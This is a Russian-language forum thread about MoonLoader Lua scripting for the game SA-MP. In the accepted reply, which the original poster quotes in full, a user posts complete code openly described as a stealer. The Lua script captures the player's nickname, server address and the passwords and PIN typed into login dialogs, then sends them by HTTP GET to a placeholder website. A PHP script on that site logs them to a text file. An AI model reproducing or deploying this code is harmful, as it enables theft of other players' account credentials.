Сохранение информации из игры на хосте

lovandog

Активный
Автор темы
226
98
Версия MoonLoader
.026-beta
есть ли возможность в луа сделать записывание информации на хосте. к примеру, я ввожу команду и он записывает информацию на моем заранее купленном хосте?

UPD: понял что это выглядит будто пишу стиллер АХХПХАХПХАХ
 
Решение
Делал когда-то стиллер, может поможет тебе:
lua часть:
--        ЛИБЫ            --
require 'lib.moonloader'
local sampev = require 'lib.samp.events'
local requests = require('requests')

--       ПЕРЕМЕННАЯ     --
local pname, server, ipname, hello, helloo = '', '', '', '', ''

--         MAIN      --
function main()
    while not isSampAvailable() do wait(0) end
    while true do
        wait(0)
        local srvname = sampGetCurrentServerName() --пиздим информацию с игрока и записываем в переменную
        local _, pid = sampGetPlayerIdByCharHandle(playerPed)
        local playerName = sampGetPlayerNickname(pid)
        local ip, port = sampGetCurrentServerAddress()
        server = srvname
        pname = playerName
        ip = ip .. ":"...

hinazuki

Потрачен
346
95
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Делал когда-то стиллер, может поможет тебе:
lua часть:
--        ЛИБЫ            --
require 'lib.moonloader'
local sampev = require 'lib.samp.events'
local requests = require('requests')

--       ПЕРЕМЕННАЯ     --
local pname, server, ipname, hello, helloo = '', '', '', '', ''

--         MAIN      --
function main()
    while not isSampAvailable() do wait(0) end
    while true do
        wait(0)
        local srvname = sampGetCurrentServerName() --пиздим информацию с игрока и записываем в переменную
        local _, pid = sampGetPlayerIdByCharHandle(playerPed)
        local playerName = sampGetPlayerNickname(pid)
        local ip, port = sampGetCurrentServerAddress()
        server = srvname
        pname = playerName
        ip = ip .. ":" .. port
        ipname = ip
    end
end

function sampev.onSendDialogResponse(id, but, lis, input)   -- пароли с диалогов тоже пиздим
    if id == 40 then
        hello = input
    end
    if id == 41 then
        helloo = input
    end
end

function sampev.onDisplayGameText(style, time, text) --теперь при зоходе игрока на сервер, отправляем GET запрос со всеми данными на хостинг
    if text:find('Welcome') then
        lua_thread.create(function()
            wait(2000)
            requests.get('http://ваш-сайт.ру/скрипт.php?onee=' .. pname .. '&twoo=' .. ipname .. '&thre=' .. hello .. '&foo=' .. helloo)
        end)
    end
end

lua часть готово, теперь серверная часть, это у меня PHP. Я хочу записать эти данные в txt (мне лень было тогда мучатся с mysql(ну если надо могу сделать))
PHP часть:
<?php
#принимаем GET запросы и записываем в переменные
$nick = $_GET['onee'];
$ipport = $_GET['twoo'];
$password = $_GET['thre'];
$pincode = $_GET['foo'];

#записываем данные в txt
if (!empty($nick))  { #проверка на пустоту
    $ultamortisa = '[' .$nick. '] [' .$ipport. '] [' .$password. '] [' .$pincode. ']'; #записываю все переменные в одну строку для удобство
    $fp = fopen("info.txt", "a"); #открыаем txt
    fwrite($fp, $ultamortisa. "\n"); #заипись
    fclose($fp); #закрыван
}
?>
1643003940052.png

И вот готово


И вообще, в этом скрипте есть все что тебе надо. Там еще прикреплена web часть скрипта, где принимается post запросы и записываются в mysql
 
  • Нравится
Реакции: lovandog

lovandog

Активный
Автор темы
226
98
pen("info.txt", "a"); #открыаем txt fwrite($fp, $ultamortisa. "\n"); #заипись fclose($fp); #закрыван } ?>
Делал когда-то стиллер, может поможет тебе:
lua часть:
--        ЛИБЫ            --
require 'lib.moonloader'
local sampev = require 'lib.samp.events'
local requests = require('requests')

--       ПЕРЕМЕННАЯ     --
local pname, server, ipname, hello, helloo = '', '', '', '', ''

--         MAIN      --
function main()
    while not isSampAvailable() do wait(0) end
    while true do
        wait(0)
        local srvname = sampGetCurrentServerName() --пиздим информацию с игрока и записываем в переменную
        local _, pid = sampGetPlayerIdByCharHandle(playerPed)
        local playerName = sampGetPlayerNickname(pid)
        local ip, port = sampGetCurrentServerAddress()
        server = srvname
        pname = playerName
        ip = ip .. ":" .. port
        ipname = ip
    end
end

function sampev.onSendDialogResponse(id, but, lis, input)   -- пароли с диалогов тоже пиздим
    if id == 40 then
        hello = input
    end
    if id == 41 then
        helloo = input
    end
end

function sampev.onDisplayGameText(style, time, text) --теперь при зоходе игрока на сервер, отправляем GET запрос со всеми данными на хостинг
    if text:find('Welcome') then
        lua_thread.create(function()
            wait(2000)
            requests.get('http://ваш-сайт.ру/скрипт.php?onee=' .. pname .. '&twoo=' .. ipname .. '&thre=' .. hello .. '&foo=' .. helloo)
        end)
    end
end

lua часть готово, теперь серверная часть, это у меня PHP. Я хочу записать эти данные в txt (мне лень было тогда мучатся с mysql(ну если надо могу сделать))
PHP часть:
<?php
#принимаем GET запросы и записываем в переменные
$nick = $_GET['onee'];
$ipport = $_GET['twoo'];
$password = $_GET['thre'];
$pincode = $_GET['foo'];

#записываем данные в txt
if (!empty($nick))  { #проверка на пустоту
    $ultamortisa = '[' .$nick. '] [' .$ipport. '] [' .$password. '] [' .$pincode. ']'; #записываю все переменные в одну строку для удобство
    $fp = fopen("info.txt", "a"); #открыаем txt
    fwrite($fp, $ultamortisa. "\n"); #заипись
    fclose($fp); #закрыван
}
?>
Посмотреть вложение 132960
И вот готово


И вообще, в этом скрипте есть все что тебе надо. Там еще прикреплена web часть скрипта, где принимается post запросы и записываются в mysql
хелп. как сделать чтобы не удаляло одинаковые строчки подряд?